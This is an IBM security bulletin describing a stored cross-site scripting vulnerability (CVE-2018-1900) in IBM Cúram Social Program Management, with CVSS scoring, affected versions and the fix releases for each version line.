A recent product penetration test identified that a stored cross-site scripting vulnerability exists in IBM Cúram Social Program Management. The issue relates to the rendering of some rich text fields if they pass through the same infrastructure, renderer, or converter where malicious content could be injected.
CVEID: CVE-2018-1900 DESCRIPTION: IBM Cúram Social Program Management is vulnerable to cross-site scripting. The vulnerability enables users to embed arbitrary JavaScript code in the web user interface that alters the intended functionality and potentially leads to credentials disclosure within a trusted session.
_CVSS Base Score: 5.4
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/152529>_ for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
IBM Cúram Social Program Management 7.0.2.0 - 7.0.4.0
IBM Cúram Social Program Management 7.0.0.0 - 7.0.1.0
IBM Cúram Social Program Management 6.2.0.0 - 6.2.0.6
IBM Cúram Social Program Management 6.1.0.0 - 6.1.1.6
IBM Cúram Social Program Management 6.0.5.0 - 6.0.5.10
_Product _
| _VRMF _ | Remediation/First Fix
—|—|—
Cúram SPM |
7.0.4
| Visit IBM Fix Central and upgrade to 7.0.4.0 iFix1 or a subsequent 7.0.4 release.
Cúram SPM | 7.0.1 | Visit IBM Fix Central and upgrade to 7.0.1.3 or a subsequent 7.0.1 release.
Cúram SPM |
6.2.0
| Visit IBM Fix Central and upgrade to 6.2.0.6 iFix2 or a subsequent 6.2.0 release.
Cúram SPM |
6.1.1
| Visit IBM Fix Central and upgrade to 6.1.1.6 iFix2 or a subsequent 6.1.1 release.
Cúram SPM |
6.0.5
| Visit IBM Fix Central and upgrade to 6.0.5.10 iFix4 or a subsequent 6.0.5.10 release.
For information about all other versions, contact IBM Cúram Social Program Management customer support.